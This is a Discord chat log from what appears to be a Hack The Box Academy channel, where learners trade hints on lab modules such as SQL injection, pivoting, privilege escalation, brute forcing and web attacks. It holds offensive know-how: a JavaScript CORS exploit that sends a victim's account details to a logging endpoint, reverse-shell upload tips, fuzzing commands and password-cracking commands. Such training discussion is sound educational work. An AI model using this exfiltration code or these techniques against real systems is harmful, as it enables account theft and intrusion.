#modules

1 messages · Page 524 of 1

sweet heron
#

Will try. Thanks

#

Both US academy I and II don't help. EU maybe?

rustic sage
#

I'm on EU 1, EU2 kept giving me time-outs

sweet heron
#

EU 2 gives more info:

PING 10.129.225.46 (10.129.225.46) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable

lethal atlas
#

DM me

silent knoll
#

Hello!

I am currently stuck on the Skills Assessment of SQLMAP Essentials.

I have already found the issue with the user-agent. Unfortunately I can’t get any further. Probably missing the correct tamper script..

Thanks for any help.

sweet heron
silent knoll
#

I did but i could not find the right lne

#

One

sweet heron
#

What command did you tried?

solemn slate
#

Hi, I am working on the PowerView module, I am stuck on this question " Find the member of the Remote Management Users group on WS01." There are no users on Remote Management group to be associated with WS01. Can anyone give me a nudge ?

sweet heron
#

Ok, now I've started Windows Privilge Escsalation Skills Assessment Part I and got a foothold, but runnning lazagne, juicypotato and printspoofer don't work. Any hint for the ldapadmin password and the priv esc questions?

naive ravine
#

Can anyone provide a nudge on Broken Authentication - Skills Assessment?

I managed to ||login as support.us|| I have also discovered that the ||token is two MD5 hashes separated by a colon|| but I am not sure what to do from here on out...

woven copper
#

@naive ravine crack that md5 hashes and see the format they use , maybe you can abuse it

frigid spade
#

Hi everyone, I’m new in HTB. Yesterday I was trying to finish the first “practice” of metasploit module but I’ve got sucked .
I was doing as follows: msfconsole, search eternalromance, use 0 (the correct one), and set RHOSTS (I’ve set the right one). All was running well but I didn’t get the shell, and I think it’s bc the LHOSTS it’s pointing to the local, no the vpn. How can I set the vpn instead my local ip? In the openvpn file I have the private key, and the public (I think, but not ip). I would appreciate any help

sweet heron
frigid spade
#

Thanks, I will try!

frigid spade
#

Hi again, I’m a little clumsy 😅 I’m trying to find the flag.txt in the windows desktop but I can’t make it. I’ve type whoami and got nt authority\system. If I make a cd desktop or C:\Users\authority\Desktop I can’t get the desktop

sweet heron
#

afaik, nt authority\system is always named Administrator on windows

#

Check the C:\Users with dir command.

frigid spade
#

Ok… found it. cd C:\Users\Administrator\Desktop.
But know, when I type flag.txt enter nothing happen.
Somebody else had the same problem?

#

Wow man, I’m soooo clumsy. type flag.txt and done😅

sweet heron
#

Anyone available for Windows Priv Esc Skills part I ? After getting foothold?

wheat garden
wheat garden
sweet heron
wheat garden
#

and ya its a feature of the box not an error. Its got a firewall that drops ping request

wheat garden
sweet heron
#

You need to be auth. I still have no creds... !

manic ermine
#

hey, did anyone else solve this?

shadow verge
#

I did

manic ermine
shadow verge
#

you can dm me

manic ermine
#

Module: Pivoting
Section: Netsh.exe
Problem:
Set up the port forward with netsh.exe using an admin powershell. All looks to be working, but the victor credentials are rejected as incorrect.
I tried xfreerdp and rdesktop with no success.
Also tried specifying the domain as inlanefreight.local, but then get the following error:

#

"We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential you can sign in with the credential.

Oh, and I've confirmed the proxy is set up by a quick nmap from attackbox to pivot host which returns a http proxy on the port.

idle kestrel
#

Does anyone have any advice for Password Attacks: credential hunting in Linux? I've tried brute forcing multiple services, but so far no luck.

unique valve
stable sparrow
#

can someone spare the time to help me with a question? I've been stuck on Broken Authentication - Reset Token for some time now and I feel like I'm going bonkers, I'm sure my script is wrong.. was wondering if somebody can point me into the right direction 🙂

agile bloom
#

Hello, I am trying to get the 5th flag on Linux Privilege Escalation Skills Assessment. I upgraded my shell using the python 3 command, but I am still unable to execute the command to escalate my privileges. Can anyone assist me?

manic ermine
#

Module: Pivoting
Section: RDP and Socks
Problem:
I am able to get the SocksOverRDP .zip onto the host, and I then expand the .zip and find the .exe and .dll. Then I run the regsvr32.exe, and get an error about the dll not existing, and look again and the DLL has disappeared...print out from cmd below:

#

UPDATE to the above: Defender is your enemy

stable sparrow
#

wow question was sorta misleading I spent an embarassing amount of time trying to figure out what the role was

rustic sage
#

spoiler alert

prisma coral
#

Hi, I'm doing the File Inclusion module now and am on the Remote File Inclusion section. I can't answer the question at the bottom of the page because the container isn't giving me a port, just an IP. No response from ping, nothing on port 80... Bit stuck and I've tried respawning it a bunch of times

pliant summit
#

hey guys in module section of using metasploit module, ive got a shell but how do i get the flag file off of the admins desktop/

polar widget
#

Or directly drop into an interactive shell, and then conduct your search

pliant summit
manic ermine
#

anyone available to help me on the pivoting skills assessment??

fair cove
#

Hey everyone

Question
On Information Gathering - Web Edition , Section is Active Subdomain Enumeration
It asks me this 10.129.69.147

  • 1 Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
    But i cant do anything with that. I have put the inlanefreight.htb in the etc/hosts but still cant do anything with this
tiny ledge
#

I'm really unfamiliar with 'awk', can someone help me create a set of rules to modify a password text file with the following rules: start with capital

One lowercase

end with digit

The password must contain at least one special char: $ # @

20+ Characters, less than 29

manic rampart
#

Hi, Guys. Hope you are having a wonderful day! I would like to get some help with "Password Attacks - Password Mutations" Task. Thank you

spare condor
#

In the Attacking Common Services module, Attacking RDP, question 2 is something wrong? I wrote the key but I get an error. (As you can see I answered the other questions)

tiny ledge
vital adder
spare condor
cold marsh
#

hi! i need some help with broken authentication module. DM me please.

rugged stag
#

I'm having the same problem. Have you been able to solve it by any chance?

west canopy
#

@tiny ledge yes we will need to filter the rockyou.txt file to find the password for the support.xx user

#

@agile bloom have you followed the directions on GTFOBins for busctl?

#

@fair cove try doing a zone transfer with dig axfr . If you need help feel free to DM 🙂

quiet prism
#

i'm on the windows fundamentals skills assessment. i'm literally looking at the SID of the security group i made and it's saying error

fair cove
quiet prism
#

i can't find a video walkthrough for this part and i'm baffled

west canopy
#

@quiet prism DM me

quiet prism
west olive
#

hi, can anyone help me at sqlmap essentials at : Running SQLMap on an HTTP Request, question 2?

gaunt scaffold
#

Hi

#

Anyone have knowledge on installing cyberrange kypo?

polar widget
iron smelt
#

hi all. just started doing modules. excited about it but now that i'm older my cli font size is its own security hazard. everyone can read it

quiet prism
#

any idea what's wrong? htb says my vpn is connected, the machine is active but when i go to nmap says host is down

agile bloom
#

I have the directions but am not sure if I am following them correctly

woven copper
manic ermine
# woven copper hi , how did you manage to solve this ?

I didn't get it solved. I tried changing VPNs but it didn't work. I just left it and moved on in the hope it would start working in the future. I noticed the machines had updates which needed to be applied so thought perhaps there were some updates to be pushed?

broken warren
#

How do brute force in the broken Authentication module? All the word lists shown are not something I've ever worked with

woven copper
#

Hi , how did you manage to solve this ? it's something extra beside following the steps

rustic sage
#

anybody knows how to make money online

languid dawn
#

... Can you not spam the same question everywhere, especially when it's unrelated to this discord

west canopy
trail pendant
#

Anyone able to give a little hint/help on the Footprinting: Hard Lab? I feel like I'm in. But I can't seem to escalate after getting ssh access :/

west canopy
#

@trail pendant try connecting to the local mysql database 🙂

rustic sage
#

Anyone here that finished the Web Attacks final Skills assement? I found the ||event create function|| but literally every XXE attempt I do fails to reconnect to my local web server instance.

west canopy
#

@rustic sage Try utilizing the technique shown in the middle of the "Local File Disclosure" section to read flag.php. If you get stuck feel free to DM 🙂

timber tide
#

I'm having a little trouble on the AD Enum & Attacks Skill Assessment I. I was able to get the first 2 tasks pretty easily but now i'm kind of just stumped on how to get the users PW. Might just need to take a brain break, but any assistance or point in the right direction would be appreciated

buoyant escarp
#

Hello im currently in the academy module SQLI, i managed to read everything inside the database, but i dont understand the question.
do i have to look for a user in a table whose username is 'user()' ?

west canopy
#

@buoyant escarp user() is a variable in the database. Try doing something like this but replace @@version with user():

buoyant escarp
west canopy
#

Yes i believe it shows who is currently logged into the database

west canopy
#

@timber tide Try using PowerView to obtain the kerberos hash for the user, and then crack it with hashcat. For example:

timber tide
buoyant escarp
#

when the backend is using php and mysql, and i use the # comment, basicly "....QUERY..." i have to set ";# so the string in php is not broken right?

carmine lark
#

Q.When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag(second last section on skills assessment).
Module : Login Brute Forcing
So I brute forced given IP after a google search reveal a get method
Got the credentials and tried login in with :
"ssh" however get his error ssh: connect to host 167.71.142.156 port 30930: Connection refused
"ftp" however get an inescapable terminal with no commands recognize
"curl" Doesn't give any results
"Firefox" Doesn't give any results.
If someone can tell me where I'm going wrong, I would appreciate it.

rustic sage
#

Can anyone offer me some help with SQLMAP essentials? I am having issues with Case #9 and trying to get past the UID wep app protection

rustic sage
west canopy
#

@timber tide You will want to find a way to get a terminal based shell to progress further through the assessment.

#

@carmine lark DM me 🙂

timber tide
mellow maple
#

Hello, Im currently in INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, I have a problem with the question of TxT i use dig and nslookup also I try the commands in the cheat sheet, can anybody help me please

manic ermine
#

Hi all, still having issues on the "pivoting" skills assessment. Anyone able to help?

lime fractal
#

Is it just me or doesn’t it make sense to have module specific channels under academy heading?….@ the mods

mystic edge
#

guys. what is wordpress simple backup pplugin vulnerability

#

I just spen 3 hours and got nothing

west canopy
#

@mystic edge is this for the Getting Started module? You want to use the wp_simple_backup_file_read exploit , and in the options set FILEPATH to /flag.txt

sage granite
#

Burp is such a fkn garbage, stop teaching ppl burp, stop doing modules with burp, just stop ffs

steep oxide
#

Hi guys, why can’t I attach files? The plus button on the left is greyed out and does not prompt anything when pressed

red obsidianBOT
#

It's an ongoing competition, please respect and read the rules. 3rd party exchanging / seeking help is prohibited and a disqualification offence

steep oxide
#

you mean 18 above cant upload?

#

hi, anyone had any clue on this question in htb brute force module ? "Once you ssh in, try brute forcing the FTP login for the other user. You should find another flag in their home directory. What is the flag?" the other user i found was m.gates, however after generating wordlists using cupp with first name Melinda, lastname gates, nickname ann, brute force attempt using the wordlist wasnt successful, any directions or clue? hope for any help from y'all

west canopy
#

@steep oxide Try running hydra from INSIDE the target machine (after you've SSH'd in.) There is a rockyou-10.txt wordlist there for you to use 🙂

steep oxide
#

@west canopy thanks for the clue...brute force machine within another machine is slow as hell😅

frigid idol
#

everyone here sir pls I need some help can anyone help me pls I am in a big trouble

languid dawn
#

call the police?

frigid idol
#

no sir I need a pro hacker to solve this problem trust me I am in a big trouble and idk how to fix it

#

pls sir help me🙏

#

🥲

languid dawn
#

doubtful, this isn't a discord to hire hackers, anything illegal will get you banned

#

go to the police

frigid idol
#

no sir like this is a discord problem

#

umm not really ig

languid dawn
#

then go ask discord's support

frigid idol
#

not working sir pls sir you guys my last hope I tried everything

languid dawn
#

then that's it, as you said you tried everything.

#

¯_(ツ)_/¯

frigid idol
#

🥲 so is it a yes sir?

#

so like should I tell my situation?

languid dawn
#

no it's over, you already did everything, that means it's impossible

frigid idol
#

🥲

languid dawn
#

yes let's hear it

frigid idol
#

just sir atleast try

languid dawn
#

🙂

frigid idol
# languid dawn yes let's hear it

well there was a girl who was a friend of mine I forgot her name she gave me a link where she told me like my brother made this game can you try it I clicked and she took my account and she took my friends account and most people think I did it and my old account have nitro that's it sir

languid dawn
#

contact

#

discord's

#

support

frigid idol
#

I did not working sir

languid dawn
#

what you're asking for is ILLEGAL and this is me asking you for the last time to drop it

#

thank you

frigid idol
#

so sir what should I do?

#

but sir the way she tricked me and took my acc that is more illegal

languid dawn
#

You can contact Discord for help and support issues through email at support@discordapp.com, via Twitter, or through various means within their help department.

frigid idol
#

but only one problem I forgot my old acc password💀

naive ravine
#

Can someone point me in the right direction on Broken Authentication Skills Assessment?

acoustic owl
#

If you keep getting stuck, write me a DM

woeful lance
#

And yes very illegal

#

But for the guy who originally wrote the program

#

And deployed it

rustic sage
#

Windows Privilege Escalation -> Miscellaneous Techniques

I got the SYSTEM privileges, but it's not clear in the question what exactly it expects? The question there is "Using the techniques in this section, find the cleartext password for an account on the target host."

What account exactly?

#

I run lazagne, got all the dump with hashes for all users

rustic sage
distant stream
weak yarrow
#

quick question, does vhost always share the same ip?

manic ermine
twin gulch
#

Hey guys

#

I need help at Linux privilege escalation module, at cron jobs part. I. Modified the backup.she file and opened a netcat but no respond. When I’m trying to open the backup file it says permissions denied..

#

Anyone?

narrow lion
#

I’m somewhat stuck on Password Attacks - Medium, I have an SSH session on one of the users, tried looking for credentials, cronjobs, backups, accessing the mysql db, brute forcing other users via SSH but they all seem like dead ends. Is anyone able to point me in the right direction?

rustic sage
barren bison
#

Hi, I'm new to HTB and HTB Academy. I want to learn pentesting on HTB Academy. With little IT knowledge, is there a list of modules to go through in order to go from zero-to-hero?

#

I desire an ordered list.

lethal latch
#

Hey, im a bit stuck with the file upload attacks skill assessment, could anyone help point me in the right direction?

obsidian gorge
#

Has anyone had weird problems with the meterpreter section of the metasploit module? The target's "time left" seems to go down waaay faster than it should. Like, it'll say 80 minutes then like 10 minutes later it's expired. The box itself also doesn't seem to want to play well

polar widget
#

sad very sad :/

#

it worked now

lethal atlas
#

need some assistance with the medium lab of footprinting. I have managed to get logged in via RDP and found the credentials for what Ithought was the sql database but not getting logged in.

acoustic owl
lethal atlas
acoustic owl
frigid idol
woeful lance
#

Discord support will help you

frigid idol
#

np but still thanks

cold marsh
#

i need help with the skill assessment of broken authentication 😐

stable sparrow
limpid wharf
#

Which WAF is being used? (Format: <name>)
Im doing the osint and i couldnt see it in the source of inlanefreight.com so i tried to use Nmap to find it but i couldnt make it work. What tool should i use to find it?

devout cliff
#

could try wafw00f?

west canopy
#

@limpid wharf it's on the front page of the website, top left hand corner. "Protected By Wxxxxxxxe"

#

I think it might show up on Wappalyzer as well

limpid wharf
#

thank you !!

west canopy
#

lol np 🙂

polar widget
#

Facing the same issue now

polar widget
granite prism
#

anyone finished the LFI module?

#

im currently doing automated scanning section and using fuff to enumerate for parameters on the target but i cant seem to find it. the payload used was - ffuf -w /root/wordlists/parameters.txt:FUZZ -u 'http://<serverip>:<port>/index.php?FUZZ=value' -fs 2287

#

is there any error in the payload or am i missing something?

#

it will be in demand for a decent amount of time

#

demand is too high and the supply is very low

dark jay
#

can any1 help with js code

tropic vessel
#

Probably even more than now, we are moving more and more into technology, meaning more people will try to take advantage of it, so probably.

dark jay
#

it says there is error on if (age)

tropic vessel
#

To be fare it’s probably going to be less in demand because more people are going to do it 👀

dark jay
#

what is the problem

tropic vessel
#

I guess if you can do it good there is nothing to worry about

dark jay
#

bruuuuuuuuuuuuhhhhhhhhh

tropic vessel
#

Lol

dark jay
#

just started to learn js

#

dont make fun of me )::::

tropic vessel
#

yes

#

I tried to do c++ once, I had no experience with coding

#

It was a nightmare

dark jay
#

thanks man

tropic vessel
#

yeah

#

Why is it disgusting

#

Hm true

#

Nonetheless, its needed for a lot of triple a games

#

Which makes it in demand

dark jay
#

I actually know one person who started coding with c and he gave up in 1 week

#

:DDDDD

#

in the university of course

#

it was not his choice

tropic vessel
#

I hated when secondary schools skipped python

#

They would teach people how to use variables then went on to html

#

God I despised creating websites

tropic vessel
#

Then I had to watch indians on youtube

#

They helped so much

#

I learnt everything in 10 minutes compared to the term of python at school

granite prism
#

anybody completed the LFI module? 😅

#

lol okay

polar widget
granite prism
#

not yet but i was assuming the payload htb supplied in the section should do the trick

polar widget
#

Solves everything flawlessly in ffuf module, just to suffer on 1st question in skills assessment

rustic sage
#

i need help with metasploit section Modules, i keep gettin a message saying "Exploit completed, but no session was created"

acoustic owl
devout cliff
#

if anyone can assist with the web attacks skill assessment please pm

rustic sage
#

do i have a problem if i tried it 12 times now?

#

how the hell do i set up this machine woth open vpn ?

#

i am using linux and i want to set up this openvpn

west canopy
#

@rustic sage is it possible you aren't using the right exploit?

rustic sage
#

linux @rustic sage

#

oh

#

backbaox

#

backbox

rustic sage
#

openvpn yourusername.ovpn this is the first command should i put my isername from the web or pc ?

#

it's harder then you think, I am dyslexic

woeful radish
#

Hello

rustic sage
#

Why am i not allow to send pics

#

verify yourself

rustic sage
west canopy
#

What section are you on?

rustic sage
west canopy
#

Try using ||ms17_010_psexec|| if you haven't already

rustic sage
#

i have

west canopy
#

did you set the LHOST and RHOST?

rustic sage
#

yep

west canopy
#

that's all it needs

white mulch
#

In the Web Proxies Module, particularly in BurpSuite Fuzzing. I have put a generic .html list as an input for the intruder but there's no answer at all. Can anyone help me on the steps on how to find the flag of that problem?

#

By no answer, I mean error 404 all the way

devout cliff
knotty falcon
#

I'm stuck on question#2 of the Predictable Reset Token module. Can someone give me a nudge?

I've decoded the password reset token for the htbuser, but I'm not sure how this will help me login as the htbadmin user?

mellow maple
#

Hello, Im currently in INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, I have a problem with the question of TxT i use dig and nslookup also I try the commands in the cheat sheet, can anybody help me please (edited)

vital adder
bronze flare
#

I’m on the Stack-Based Buffer Overflows on Linux x86 module and the Skills Assessment is giving me a headache. I’m making a payload using msfvenom and putting that into the python run command in gdb. But when I cat msg.txt, it doesn’t show me the flag as I would expect, instead having a bunch of arbitrary characters.

mellow maple
bronze flare
vital adder
vital adder
manic ermine
#

Attacking common services module
SQL section
Unable to login with the provided credentials. Any pointers would be very appreciated! I keep getting "the login is from an untrusted domain and cannot be used with Integrated authentication"

scarlet sapphire
#

hi can someone give a hint about Password attack Medium lab i have ssh session but i cant find any creds

versed roost
#

hey guys. i have been tried to exploit CORS and i bypassed the origin by using this method :

Origin:https://vulnerabile-website.com
Origin:https://mylink-to-redirect-the-wite.com

i added second origin to bypass it . and it worked .
but here is the problem . i wanna exploit it by javascript . and this is the normal exploit :

<html>
  <body>
    <script>
      var xhr = new XMLHttpRequest();
      var url = "  https:/  /ac211f241efad372c645255700030006.web-security-academy.net"
      xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE){
          fetch("/log?key" + xhr.responseText)
        }  
      }  
  
      xhr.open('GET', url+ "/accountDetails",true);
      xhr.withCredentials = true;
      xhr.send(null)
      alert(xhr)
    </script>
  </body>
</html>

but as you can see there is only one origin request is listed here . but how i can send the secend one to use the method i used up , here ?
i cant just write the source twice . i need it to be in one request not tow !

vital adder
scarlet sapphire
vital adder
pliant summit
#

um hey guys quick question

#

im doing a module on metasploit and when i launch the target it's not even able to ping it, is that normal?

#

cant access the webpage either

polar widget
scarlet sapphire
polar widget
# pliant summit cant access the webpage either

Pings would be disabled from target host, so try nmap with -Pn switch to quickly check for host availability and port too. Next thing is, there maybe non-standard ports. Leave no stone unturned

vital adder
pliant summit
rustic sage
rotund mountain
#

Hi all! I'm having troubles with ZAP's hud. When I try to do the hud tutorial or just follow along to the modules in general, I can't use any of the functionality of the hud what-so-ever. This is true for both my local vm of parrotOS and the pwnbox on academy. Has anyone had the same problem and perhaps have a solution?

Thanks! 🙂

polar widget
pliant summit
#

yea i left came back and it takes pings now so i assume its up , many thanks

white mulch
#

Hey I was doing the Web Proxy module and inside of that ZAP Scanner, I was supposed to find a flag which can be using the ZAP Active Scanner as a remote code injection.

rotund mountain
white mulch
#

Oh yeah I got it as well

#

have you done the skills assesment thing at the last of the module?

rotund mountain
#

@white mulch I'm doing that now actually

white mulch
#

I'm stuck actually

rotund mountain
#

I was gonna ask you if your zap hud works as well

#

dm me 😛

white mulch
#

Yeah

#

I have dm'ed you

rustic sage
#

We don't/can't do that here

candid sandal
#

Guys, I'm trying to download the file winPEASx64.exe for window priviledge escalation but all of my browsers refuse to download it, thinking there's a virus in it. I then tried to download it using the command line with wget but I still have the same message that it potentially contains a virus

acoustic owl
candid sandal
#

It is in the StartingPoint - Archetype, so technically not a module of the academy

rustic sage
#

hello guys

i am doing the login brute forcing module, and it is the first page of the skills assessment.. i manage to get the first flag, but when i am trying to brute force the admin_login.php i am getting a lot of username and password matches, but none of them seem to work.. could someone give me a clue?

acoustic owl
rustic sage
#

I'm stuck on the SMB practical in the attacking common services module -- I can't find the wordlist it's referring to

undone girder
#

Hi guys im currently working on Attacking web applications with ffuf im trying to get the parametersthat would be accepted on a page but after fuzzing i get no hits any help will be appreciated!

scarlet finch
#

delete the flag plz

timber tide
#

Hey All, i'm stuck at the AD Enumeration & Attacks skills assessment 1 - Getting the flag on the Administrator desktop on MS01. I pulled the user accounts from the WEB box and attempted to crack their hashes, only the user in the previous questions was cracked. I'm stumped on how to access or get a shell on MS01. Any push in the right direction would be appreciated

naive ravine
acoustic owl
rustic sage
#

Hello, i am very new to hacking and i recently decided that i wanted to do one. And i haven't found any tutorials on how i can learn to do that. If anyone here can help me i would appreciate!

pine cargo
#

For Footprinting SMTP module, would smtp-user-enum be the intended tool to enumerate the users? I'm using that, but is there a more efficient way or a different intended way to find the username on the system?

acoustic owl
rustic sage
#

Oh, thank you payload!

acoustic owl
acoustic owl
rustic sage
#

Thank you.

high zinc
#

uh.. xD

#

wrong tag

devout cliff
#

the perfect tag

high zinc
#

thanks anyway youknowwho

raven cairn
#

Could I have some help on the wordpress skill assesment???

acoustic owl
raven cairn
#

I mostly am just confused on what vulns to exploit.

#

I have been reading POC's from wpscan and I need a little nudge

acoustic owl
#

Have you performed a WPScan with token? Then it should show you a plugin that is vulnerable.

raven cairn
#

YEs. I have been using my own api token.

#

There are just lots of vulnerablilities in the plugins

#

Nvm. Give me a sec

#

I will try a little bit more on my own

#

I think I found something

rustic sage
#

@acoustic owl hey

acoustic owl
#

Hi

knotty falcon
#

Can someone please help me with Question # 2 in Bruteforcing Cookies?

The lesson implies that we should use CyberChef and/or Wikipedia's list of File Signatures to solve this, but its not clear how we actually ID the encoding method used. Are we supposed to randomly apply recipes to the token in CyberChief and hope to get lucky? Also the Decodify tool can't crack it, and the token seems too long and complex for JohnTheRIpper to work in a reasonable amount of time...

rustic sage
#

Can i ask something?

acoustic owl
rustic sage
acoustic owl
rustic sage
acoustic owl
#

My way led me via Udemy (networking, Linux, Python, web development) to TryHackMe and from there here to the Academy.

raven cairn
#

Get familiar with how web apps work

#

Get familiar with Active Directory

#

Get familiar with Networking

#

Then Do HTB academy

rustic sage
#

Ok, Thanks

west canopy
#

Throw in python while you're at it

#

and maybe some Assembly

raven cairn
#

If you need any tips @rustic sage you can dm

west canopy
#

man i feel overwhelmed just thinking about it

raven cairn
west canopy
#

Yea the amount of stuff you need to know just to get started is massive. And all of that is barely scratching the surface.

acoustic owl
raven cairn
#

If I want to specialize in pentesting a business, what should I focus on?

acoustic owl
raven cairn
#

If I complete the pentest path, will I be ready to do the OSCP?

acoustic owl
#

My goal currently is to complete the Jr. Pentester path and then the Active Directory path.
After that I would like to do a few Pro Labs.

acoustic owl
ebon pine
#

Hello everyone, a little confused on getting started: nibbles-intital foothold. I am having issues translating what I am supposed to do in the lesson to the actual Pwnbox. Any hints would be greatly appreciated. Took 3 days off so a little rusty on where I am at

west canopy
#

@ebon pine we want to upload a file to "My Image" but it's actually a php script containing a reverse shell

ebon pine
west canopy
#

yep , will just need to change the IP address and port to match your machine

ebon pine
#

would it be more appropriate to Dm you?

west canopy
#

your machine, not the target machine. A reverse shell will make the target machine connect back to you (which is why we provide our own IP and port)

ebon pine
#

that makes perfect sense

#

thank you!

west canopy
#

np 🙂

lethal latch
#

I'm stuck on the second question of weak brute force protections in the broken authentication module, could anyone give me a push in the right direction?

lethal latch
#

nevermind, i got it

pine cargo
#

Hey guys, can I get a nudge on getting the admin email for the imap/pop3 section of the footprinting module.
I've connected to the imap and pop3 servers with both curl and openssl s_client with the user robin, and using list and stat has shown that robin has no emails in INBOX as well as the DEV box. I have some usernames that I verified during the smtp section before which can be the admin user, so am I to use the verified usernames and bruteforce the password? Or does robin's email server contain a message that I haven't been able to find?

#

My current guess is it has something to do with the capabilities

#

Just reading through some of the RFC's

idle kestrel
#

Could I please have some help with Password Attacks: credential hunting in Linux? I think I need to brute force ftp or ssh, but when I do I don't find a valid login. I've tried both files from the resources section and kira as the username with the password file as the one from the resource section.

pine cargo
#

Took a break, came back, and now I can see TAG "1" UID. Now I guess it's time to dive into a vid about imap/pop commands

west canopy
#

@pine cargo yes the imap commands are pretty clunky. If you need help i might be able to assist so feel free to DM me 🙂

pine cargo
#

Now I'm just irritated I didn't find it sooner, seems so easy to find in hindsight

west canopy
#

sweet! nice work !

sweet brook
#

CryptoAnar84

mystic edge
#

how to found admin password of nibbleblog

manic ermine
#

Any chance of a nudge for the "Attacking Common Services" medium skills assessment? Is it just a matter of brute forcing with the lists provided by the course?

acoustic owl
manic ermine
acoustic owl
manic ermine
#

The key is all ports. Thanks.

unreal crescent
#

Why am I having so many issues with Active Subdomain Enumeration... Always NXDOMAIN and other errors... It's almost like I can't hit anything, but I can

tiny ledge
#

Does anyone have the code to parse the password list for Broken Authentication - Skills Assessment, I cant figure out how to modify the rockyou list

acoustic owl
tiny ledge
acoustic owl
mint crystal
#

Doing the Vulnerability Assessment module. The VMs are insanely slow and disconnect all the time. Anyone else have this problem as well?

steep oxide
#

hi guys, about HTB hashcat module, hybrid mode section , Question-'Crack the following hash: 978078e7845f2fb2e20399d9e80475bc1c275e06 using the mask ?d?s.' ; I've hashid the hash and found the hash type to be 160, nano the hash into hybrid_hash, and use this command "hashcat -a 7 -m 160 hybrid_hash '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt" but an error of "no hased loaded appear", any clue where went wrong?

west canopy
#

@steep oxide your hash mode number is incorrect, it's not -m 160

steep oxide
#

i tried 100 as well for SHA1 it didnt work too, for the others hash type mostly i couldnt search the hash type numbers

tiny ledge
#

Any tips how to make changes with AWK, so it deleted all entries where last character is not digit

pine cargo
#

Though this didn't work, this is how you use a mask attack

#

Kinda confused that it didn't work, but I'm guessing that the mask isn't only ?d?s

steep oxide
#

ive got it worked using this command ; hashcat -a 6 -m 100 978078e7845f2fb2e20399d9e80475bc1c275e06 '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' '?d?s'

#

thanks anyways😀

pine cargo
#

lol, I've gone 9 ?a's long in bruteforcing

#

hashcat and password cracking are things where hackers benefit with a better system, either that or aws

pine cargo
#

^This prints it into stdout

#

To make changes to file do
command > tmp && mv tmp file

#

This would delete original file

#

otherwise you could also redirect to a new file with
command > newfile

#

Nevermind, forget that,
awk has the -i feature

#

You can do
awk -i inplace '/[^a-z]$/ { print }' input

#

^Single command to modify the file

manic ermine
#

Hi all, I think I "cheated" on the common services hard lab. I managed to get system without using RDP at all and without taking over anyones account as is suggested by the second last question. If someone knows the "correct" solution for this box could you DM me and let me know?

pallid breach
#

I am stuck on the "What does the Linux PAM acronym stands for?"

#

I found the answer

#

but the system keeps saying it is incorrect

#

:/

#

It doesn't have

#

and I found the answer

#

I was too formal

#

||Linux PAM stand for Linux Pluggable Authentication Modules||

#

instead of

#

||Pluggable Authentication Modules||

#

It worked

#

That was the correct answer

vital adder
manic ermine
rustic sage
#

Hello, i have problem with File Inclusion Skills Assesment, only what i get it is Invalid input detected? Somebody have idea what is wrong?

sage jackal
#

Need help on the FOOTPRINTING module - DNS section: Can’t brute force the host which ip end with 203

granite prism
#

anyone here finished the lfi skills assessment?

acoustic owl
split lynx
#

HTB Vulnerability assesment. Nessus skill assessment.
Connected to Nessus and I can’t do anything. Any ideas? (Using workstation)

turbid hull
acoustic owl
west olive
#

on mysql esentials on the OS Exploitation section i have a problem with the second question. i can create an interactive os shell but i cant find the other flag

fathom bay
#

hey guys can anyone help me withthe file upload attacks > type filters . i get the " image (link to the uploaded file) cannot be displayed because it contains error

sage jackal
acoustic owl
lethal atlas
sage jackal
sage jackal
languid dawn
steep oxide
#

hey guys, any of you encounter this when compiling zip2john , it says "fatal error: arch.h: No such file or directory", how do i solve this? i need it for the hashcat module question

paper crag
#

Did you get an answer to this? I'm at the Socks tunnelling section and those credentials are not working for me either...

acoustic owl
#

@paper crag @shadow verge try it with the US 1 VPN

shadow verge
#

No need i have completed the module i was asking for someone asking for help

tiny ledge
#

Any tips using ' sed ', I need to delete all the lines not containing a special character '$ # @'

shadow verge
lethal atlas
#

@acoustic owl can I DM you?

acoustic owl
stiff tiger
void stirrup
#

hi every one i've a doubt with the module "Network Enumeration with Nmap"
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

this command not working and I dont understanding why.
this is the answer
setup_target: failed to determine route to 10.129.2.28

lethal atlas
#

do you have an IP assigned to tun0?

void stirrup
void stirrup
lethal atlas
void stirrup
#

ok thanks

vagrant latch
#

Hello world !!

#

I have a problem with the intro to Network traffic analysis.

#

What addressing mechanism is used at the Link Layer of the TCP/IP model?

#

It's MAC but I can't valid this answer.

#

Can you help me ?

west canopy
#

@vagrant latch DM me 🙂

vagrant latch
pallid breach
#

getting started

#

module

#

the "List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."

#

I need help

#

I use the
smbclient -N -L \\\\<ip> >smbclient \\\\<ip>\\users>smbclient -U bob \\\\<ip>\\users

#

then I get the error "session setup failed: NT_STATUS_LOGON_FAILURE"

#

every fucking time

#

even restarted the IP adress

#

multiple times

#

and followed the same process

orchid sapphire
#

use forward slash

#

\ is for skids

pallid breach
#

after this? smbclient -U bob \\\\<ip>\\users

west canopy
#

@pallid breach just tested on my end and I'm not experiencing issues. Your command looks correct.

west canopy
#

Are you working from a VM or using pwnbox?

pallid breach
#

parrot os in vmware workstation

west canopy
#

Try using the pwnbox, it's the built in browser baseed parrotOS

#

thats what i just used now

pallid breach
#

too much fucking around and I already used the 1 instance for today

west canopy
#

I once had a weird issue on Footprinting Medium Lab. I work from a kali VM and i could not transfer files off the SMB share that I had to access to finish the section.

#

but from Pwnbox it worked fine.

pallid breach
#

ok

#

what vmware are you using

#

the playbox or sum like that one?

west canopy
#

i use virtualbox

pallid breach
#

is it free?

west canopy
#

yep

#

maybe a dumb question but you can ping the target right?

pallid breach
#

yeah

#

it works too

west canopy
#

ah ok

pallid breach
void shadow
#

Yes

west canopy
#

yep that's the one

pallid breach
#

how did you add the parrot os to it?

west canopy
#

i don't use parrot , i just tested on the pwnbox. I use Kali from virtualbox

#

the in-browser parrot OS that you can spawn is the pwnbox

pallid breach
#

I am sick of this hacking thing

#

I'll do it tomorrow

#

